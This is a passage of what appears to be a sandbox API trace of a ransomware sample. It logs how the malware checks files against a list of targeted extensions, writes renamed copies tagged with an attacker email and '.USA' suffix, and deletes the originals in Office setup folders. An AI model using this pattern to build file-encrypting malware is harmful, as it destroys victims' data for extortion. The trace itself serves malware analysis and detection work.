[0040.458] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.458] lstrlenW (lpString=".pdf") returned 4 [0040.458] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString=".xls") returned 4 [0040.458] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString=".xlsx") returned 5 [0040.458] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.458] lstrlenW (lpString=".ppt") returned 4 [0040.458] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.458] lstrlenW (lpString=".zip") returned 4 [0040.458] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.458] lstrlenW (lpString=".rar") returned 4 [0040.458] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString=".bz2") returned 4 [0040.458] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString=".7z") returned 3 [0040.458] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.459] lstrlenW (lpString=".dbf") returned 4 [0040.459] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.459] lstrlenW (lpString=".1cd") returned 4 [0040.459] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.459] lstrlenW (lpString=".jpg") returned 4 [0040.459] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.459] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.459] lstrlenW (lpString="SETUP.XML") returned 9 [0040.459] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.460] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1988) returned 1 [0040.460] CloseHandle (hObject=0x1b4) returned 1 [0040.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 0x20 [0040.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.460] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.460] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.461] GetLastError () returned 0x0 [0040.461] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x7c4, lpOverlapped=0x0) returned 1 [0040.462] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0040.463] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.463] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.463] SetEndOfFile (hFile=0x1b8) returned 1 [0040.463] CloseHandle (hObject=0x1b8) returned 1 [0040.464] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.464] SetEndOfFile (hFile=0x1b4) returned 1 [0040.464] CloseHandle (hObject=0x1b4) returned 1 [0040.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.465] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 1 [0040.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.465] lstrlenW (lpString=".doc") returned 4 [0040.465] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.465] lstrlenW (lpString=".docx") returned 5 [0040.465] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.465] lstrlenW (lpString=".pdf") returned 4 [0040.465] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.465] lstrlenW (lpString=".xls") returned 4 [0040.465] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.465] lstrlenW (lpString=".xlsx") returned 5 [0040.465] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.465] lstrlenW (lpString=".ppt") returned 4 [0040.465] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.465] lstrlenW (lpString=".zip") returned 4 [0040.465] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.465] lstrlenW (lpString=".rar") returned 4 [0040.465] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.835] lstrlenW (lpString=".bz2") returned 4 [0040.835] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.835] lstrlenW (lpString=".7z") returned 3 [0040.836] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.836] lstrlenW (lpString=".dbf") returned 4 [0040.836] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.836] lstrlenW (lpString=".1cd") returned 4 [0040.836] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.836] lstrlenW (lpString=".jpg") returned 4 [0040.836] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.836] lstrlenW (lpString=".doc") returned 4 [0040.836] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.836] lstrlenW (lpString=".docx") returned 5 [0040.836] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.836] lstrlenW (lpString=".pdf") returned 4 [0040.836] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.836] lstrlenW (lpString=".xls") returned 4 [0040.836] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.836] lstrlenW (lpString=".xlsx") returned 5 [0040.836] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.836] lstrlenW (lpString=".ppt") returned 4 [0040.836] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.836] lstrlenW (lpString=".zip") returned 4 [0040.836] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.836] lstrlenW (lpString=".rar") returned 4 [0040.836] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.836] lstrlenW (lpString=".bz2") returned 4 [0040.836] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.836] lstrlenW (lpString=".7z") returned 3 [0040.836] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.837] lstrlenW (lpString=".dbf") returned 4 [0040.837] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.837] lstrlenW (lpString=".1cd") returned 4 [0040.837] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.837] lstrlenW (lpString=".jpg") returned 4 [0040.837] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.837] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.837] lstrlenW (lpString="Proof.XML") returned 9 [0040.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.837] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1347) returned 1 [0040.837] CloseHandle (hObject=0x1ec) returned 1 [0040.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 0x20 [0040.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.838] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.838] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0040.838] GetLastError () returned 0x0 [0040.838] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x543, lpOverlapped=0x0) returned 1 [0040.840] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x550, lpOverlapped=0x0) returned 1 [0040.841] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.841] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.841] SetEndOfFile (hFile=0x1f0) returned 1 [0040.841] CloseHandle (hObject=0x1f0) returned 1 [0040.842] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.842] SetEndOfFile (hFile=0x1ec) returned 1 [0040.842] CloseHandle (hObject=0x1ec) returned 1 [0040.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.843] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 1 [0040.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.843] lstrlenW (lpString=".doc") returned 4 [0040.843] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.843] lstrlenW (lpString=".docx") returned 5 [0040.843] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.843] lstrlenW (lpString=".pdf") returned 4 [0040.843] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.843] lstrlenW (lpString=".xls") returned 4 [0040.843] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.843] lstrlenW (lpString=".xlsx") returned 5 [0040.843] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.843] lstrlenW (lpString=".ppt") returned 4 [0040.843] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.843] lstrlenW (lpString=".zip") returned 4 [0040.843] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.843] lstrlenW (lpString=".rar") returned 4 [0040.843] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.843] lstrlenW (lpString=".bz2") returned 4 [0040.843] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.843] lstrlenW (lpString=".7z") returned 3 [0040.843] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.843] lstrlenW (lpString=".dbf") returned 4 [0040.844] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.844] lstrlenW (lpString=".1cd") returned 4 [0040.844] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.844] lstrlenW (lpString=".jpg") returned 4 [0040.844] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.844] lstrlenW (lpString=".doc") returned 4 [0040.844] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString=".docx") returned 5 [0040.844] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.844] lstrlenW (lpString=".pdf") returned 4 [0040.844] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString=".xls") returned 4 [0040.844] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString=".xlsx") returned 5 [0040.844] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.844] lstrlenW (lpString=".ppt") returned 4 [0040.844] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.844] lstrlenW (lpString=".zip") returned 4 [0040.844] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.844] lstrlenW (lpString=".rar") returned 4 [0040.844] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString=".bz2") returned 4 [0040.844] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString=".7z") returned 3 [0040.844] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.844] lstrlenW (lpString=".dbf") returned 4 [0040.844] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.844] lstrlenW (lpString=".1cd") returned 4 [0040.844] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.845] lstrlenW (lpString=".jpg") returned 4 [0040.845] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.845] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.845] lstrlenW (lpString="Proof.XML") returned 9 [0040.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.846] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1457) returned 1 [0040.846] CloseHandle (hObject=0x1ec) returned 1 [0040.846] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 0x20 [0040.846] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.846] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.846] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.846] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.846] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0040.846] GetLastError () returned 0x0 [0040.846] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x5b1, lpOverlapped=0x0) returned 1 [0040.848] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0040.849] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.849] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.849] SetEndOfFile (hFile=0x1f0) returned 1 [0040.849] CloseHandle (hObject=0x1f0) returned 1 [0040.850] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.850] SetEndOfFile (hFile=0x1ec) returned 1 [0040.851] CloseHandle (hObject=0x1ec) returned 1 [0040.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.851] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 1 [0040.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString=".doc") returned 4 [0040.851] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString=".docx") returned 5 [0040.851] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.851] lstrlenW (lpString=".pdf") returned 4 [0040.851] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString=".xls") returned 4 [0040.851] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString=".xlsx") returned 5 [0040.851] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.851] lstrlenW (lpString=".ppt") returned 4 [0040.851] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString=".zip") returned 4 [0040.851] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.851] lstrlenW (lpString=".rar") returned 4 [0040.852] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString=".bz2") returned 4 [0040.852] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString=".7z") returned 3 [0040.852] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.852] lstrlenW (lpString=".dbf") returned 4 [0040.852] 